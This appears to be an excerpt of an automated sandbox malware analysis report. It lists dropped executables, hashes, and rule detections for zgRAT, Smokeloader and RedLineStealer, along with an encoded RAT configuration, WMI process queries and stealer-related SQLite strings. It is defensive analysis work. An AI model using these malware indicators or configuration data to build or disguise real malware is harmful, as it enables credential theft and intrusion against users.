Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0649A6B8	20_2_0649A6B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_064967D8	20_2_064967D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06493F50	20_2_06493F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0649A688	20_2_0649A688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06496FE8	20_2_06496FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06496FF8	20_2_06496FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06750448	20_2_06750448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0675D4E8	20_2_0675D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0675C980	20_2_0675C980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06755108	20_2_06755108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06795E40	20_2_06795E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067908D8	20_2_067908D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067908B5	20_2_067908B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067A5400	20_2_067A5400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067A9C40	20_2_067A9C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067AE9C8	20_2_067AE9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067A9C40	20_2_067A9C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067A9C40	20_2_067A9C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936F8C0	20_2_0936F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_09368558	20_2_09368558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936EDE8	20_2_0936EDE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936F440	20_2_0936F440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_09366738	20_2_09366738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936C720	20_2_0936C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936E610	20_2_0936E610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936D6E8	20_2_0936D6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936B876	20_2_0936B876
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936F8B0	20_2_0936F8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936DD40	20_2_0936DD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_09368549	20_2_09368549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936EDD8	20_2_0936EDD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_09366C50	20_2_09366C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_09366C42	20_2_09366C42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936AF5E	20_2_0936AF5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936E600	20_2_0936E600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0936D6E4	20_2_0936D6E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00402310	25_2_00402310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_004050B0	25_2_004050B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_0042045E	25_2_0042045E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_0040FCE0	25_2_0040FCE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00419D09	25_2_00419D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_0041950B	25_2_0041950B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00415625	25_2_00415625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00404EF0	25_2_00404EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_0040CF7F	25_2_0040CF7F
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_05687770	26_2_05687770
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_05687468	26_2_05687468
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_05687458	26_2_05687458
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_05687763	26_2_05687763
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_074E0450	26_2_074E0450
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_074EF540	26_2_074EF540
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_074E0568	26_2_074E0568
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_074E0578	26_2_074E0578
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_02A8DC74	28_2_02A8DC74
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_05136948	28_2_05136948
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_05137C20	28_2_05137C20
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_05130006	28_2_05130006
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_05130040	28_2_05130040
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_05137C10	28_2_05137C10
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_063467D0	28_2_063467D0
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_0634A3E8	28_2_0634A3E8
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_06343F50	28_2_06343F50
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_0634A3B7	28_2_0634A3B7
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_06346FF8	28_2_06346FF8
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_06346FE8	28_2_06346FE8
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_07983FD8	28_2_07983FD8
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_07981718	28_2_07981718
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_07981728	28_2_07981728
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_07981E58	28_2_07981E58
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_07980D90	28_2_07980D90
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_07980DA0	28_2_07980DA0
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_07980006	28_2_07980006
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_07980040	28_2_07980040
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_0040208D	30_2_0040208D

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe

Process token adjusted: Security

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: String function: 00407D20 appears 55 times

Source: BitcoinCore[1].exe.17.dr

Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)

Source: Set-up[1].exe.17.dr	Static PE information: Number of sections : 18 > 10
Source: Set-up.exe.17.dr	Static PE information: Number of sections : 18 > 10
Source: BitcoinCore[1].exe.17.dr	Static PE information: Number of sections : 11 > 10

Source: PQ2AUndsdb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 26.0.wxfM3haI2K.exe.e80000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 38.0.XClient_protected.exe.df0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 25.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 25.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001E.00000002.2041286886.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001E.00000002.2041214532.00000000007B1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI

Source: whiteheroin.exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GOLD[1].exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GOLD.exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda[1].exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda.exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: setup2[1].exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: setup2.exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PQ2AUndsdb.exe	Static PE information: Section: ZLIB complexity 0.9971155483651226
Source: PQ2AUndsdb.exe	Static PE information: Section: rxawdntq ZLIB complexity 0.9946241942475874
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9971155483651226
Source: axplong.exe.0.dr	Static PE information: Section: rxawdntq ZLIB complexity 0.9946241942475874

Source: XClient_protected[1].exe.17.dr, Settings.cs	Base64 encoded string: 'l9AFydArBcuri5QaAlcb1JBCbXzMpJYstYrQ2PYBcAaxmByVDMmCLdQxST4+BI9Uti0eaXKvnrH7J7iMUceYYg==', 'qG7j3yVaxRKQrNka0Ndn//+QtxoYEbUkUyLBILeDskhirZXdQiO7RjEhOaz53VktMs+lEVsuroadS4owlhPBM46+AVFqZoQ+VJSHk0UrlnQ=', 'Q4c9ylY7HaOdoKhNQ4QtgqPCrcDO8/6C/VMlHNzKRjF0qp6gPeXmI7F2DI7mjZhedpxO/tS3JlGENugZalSFR/cgSooBY2COmIm74pNl9+dUYo/uxKsUDcbpGadcCbHJjNFf/SRmcBwdGKJVPkdSVfVjGpb/7x1ScyuUY5J8gkLoj6LXOpi1cxRdJ7beIZxJ/MFRvLjnPtpfyQZXoXE5aIBmKd+zPmMZOJt5ojKYSxXRKtswIf70GE0VG2NI8l8lfe1OTPV1KhCtFByAtEu7mRkdaiyv/dcHMReZhqmQRiTVJYb55yPPJsqrLBy9y3NWPK0+X/zRiNGjCSD7kJ4awiN5B0UiQREpgh7XRKSrDvBJ3JPjHNDbIgE6OVHHqyfsZOGk2TByTfPtpGYlYMmcqN3dUjlPoy23mBYdIghUU1AGYMo6UNVR/a2ZnGSpF36yfuglLmq5EsOCgbT+6NhtliqNeGIsjIJqpxlSHGHLw4oSbObJBc17aozYPXhBs85wacMpZR1HUhPemkHuPaSGiPRSNYU8kd1rQaiPoJvnQt/DytwCSjtHc9p1dGB7461NrsEva2TL34PKyayVhhMWgqk230JFa0JcKc/ZpiArWDcQVuse9JVY1DjxpJViY41vDESffhMcLi/X0bBxHzXjOg9IHOt8/uD7Bii8+lGFsPF4rGxW8XescToL7PhGqKayPZtCyGgnvifEPrZhMFSOr8ArI6BT5h4pHsPvvmxlb6zfH4S88Y2KqFjZSUhz7bLXCnz0qXLkms4WKEkkxiGth6HJ94/1Ipjw5eS3Sq1E12UKmuNoI60gc7eIboxZxqtBC4FiXieDlmwvPEEXdP7pZi5Ipp5xkET1lHd+lvVv673rJyglJqkFsaKh2Ru6nB/Epcb2l1Zc51Xgmn+z0jOyMBbbO5FJHv+oRp4RiFXXFWk9WGKGP3VkQS6/KSyoes2mgbvDXcPKjABGbU2vOoKKxczJeHObVZkqsTykMkcDmiW/57+CHfFTsLm/kMSk2clxnoW7CTTs3XQgyKWosqUkBUsKg8X549tHwC56ZoCWPHNdidRA6QLPTR6q+Wz2UDXe', 'hjxFb55R9GX7nvNRnapOayRcuf3MDd2+t7O6lKZG2tzZ/KdZ37e/cgJWcNvtU/Z0+ugSlSu7X+FxYLh+dbPMfQ==', 'igEqc5OLsfzdDTYO8JW8NkaNDnKrIlkTq3HG4bA9tUw7npUVdwoJgXUbIwj8hPDIanIy9i4uDkjyLnpfp/uymg==', 'Z4YBGYg71IABFezJz7s42AEUgWFoi8xT7UBcxjybeo9ym5UfvNpLn9ptU3zwjj3dqBKrpd07fzonar8Knngj2Q==', 'gihyp2d1V9bOmD7T/ThFz2k/8aKrO/n+Gr3u2ioSy8pk5gULHVcAmKDHkepl0vkDA5WxXF/A1QaOd4OWlhWNpA=='
Source: XClient_protected.exe.17.dr, Settings.cs	Base64 encoded string: 'l9AFydArBcuri5QaAlcb1JBCbXzMpJYstYrQ2PYBcAaxmByVDMmCLdQxST4+BI9Uti0eaXKvnrH7J7iMUceYYg==', 'qG7j3yVaxRKQrNka0Ndn//+QtxoYEbUkUyLBILeDskhirZXdQiO7RjEhOaz53VktMs+lEVsuroadS4owlhPBM46+AVFqZoQ+VJSHk0UrlnQ=', 'Q4c9ylY7HaOdoKhNQ4QtgqPCrcDO8/6C/VMlHNzKRjF0qp6gPeXmI7F2DI7mjZhedpxO/tS3JlGENugZalSFR/cgSooBY2COmIm74pNl9+dUYo/uxKsUDcbpGadcCbHJjNFf/SRmcBwdGKJVPkdSVfVjGpb/7x1ScyuUY5J8gkLoj6LXOpi1cxRdJ7beIZxJ/MFRvLjnPtpfyQZXoXE5aIBmKd+zPmMZOJt5ojKYSxXRKtswIf70GE0VG2NI8l8lfe1OTPV1KhCtFByAtEu7mRkdaiyv/dcHMReZhqmQRiTVJYb55yPPJsqrLBy9y3NWPK0+X/zRiNGjCSD7kJ4awiN5B0UiQREpgh7XRKSrDvBJ3JPjHNDbIgE6OVHHqyfsZOGk2TByTfPtpGYlYMmcqN3dUjlPoy23mBYdIghUU1AGYMo6UNVR/a2ZnGSpF36yfuglLmq5EsOCgbT+6NhtliqNeGIsjIJqpxlSHGHLw4oSbObJBc17aozYPXhBs85wacMpZR1HUhPemkHuPaSGiPRSNYU8kd1rQaiPoJvnQt/DytwCSjtHc9p1dGB7461NrsEva2TL34PKyayVhhMWgqk230JFa0JcKc/ZpiArWDcQVuse9JVY1DjxpJViY41vDESffhMcLi/X0bBxHzXjOg9IHOt8/uD7Bii8+lGFsPF4rGxW8XescToL7PhGqKayPZtCyGgnvifEPrZhMFSOr8ArI6BT5h4pHsPvvmxlb6zfH4S88Y2KqFjZSUhz7bLXCnz0qXLkms4WKEkkxiGth6HJ94/1Ipjw5eS3Sq1E12UKmuNoI60gc7eIboxZxqtBC4FiXieDlmwvPEEXdP7pZi5Ipp5xkET1lHd+lvVv673rJyglJqkFsaKh2Ru6nB/Epcb2l1Zc51Xgmn+z0jOyMBbbO5FJHv+oRp4RiFXXFWk9WGKGP3VkQS6/KSyoes2mgbvDXcPKjABGbU2vOoKKxczJeHObVZkqsTykMkcDmiW/57+CHfFTsLm/kMSk2clxnoW7CTTs3XQgyKWosqUkBUsKg8X549tHwC56ZoCWPHNdidRA6QLPTR6q+Wz2UDXe', 'hjxFb55R9GX7nvNRnapOayRcuf3MDd2+t7O6lKZG2tzZ/KdZ37e/cgJWcNvtU/Z0+ugSlSu7X+FxYLh+dbPMfQ==', 'igEqc5OLsfzdDTYO8JW8NkaNDnKrIlkTq3HG4bA9tUw7npUVdwoJgXUbIwj8hPDIanIy9i4uDkjyLnpfp/uymg==', 'Z4YBGYg71IABFezJz7s42AEUgWFoi8xT7UBcxjybeo9ym5UfvNpLn9ptU3zwjj3dqBKrpd07fzonar8Knngj2Q==', 'gihyp2d1V9bOmD7T/ThFz2k/8aKrO/n+Gr3u2ioSy8pk5gULHVcAmKDHkepl0vkDA5WxXF/A1QaOd4OWlhWNpA=='

Source: XClient_protected[1].exe.17.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient_protected[1].exe.17.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: XClient_protected.exe.17.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient_protected.exe.17.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@49/75@6/8

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe

Code function: 30_2_007C2F65 CreateToolhelp32Snapshot,Module32First,

30_2_007C2F65

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\GOLD[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Mutant created: \Sessions\1\BaseNamedObjects\hwelcvbupaqfzors
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

File created: C:\Users\user~1\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3.dll.31.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.31.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.31.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.31.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.31.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.31.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.31.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, stealc_default2.exe, 0000001F.00000002.2196379548.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2174996744.000000001B526000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
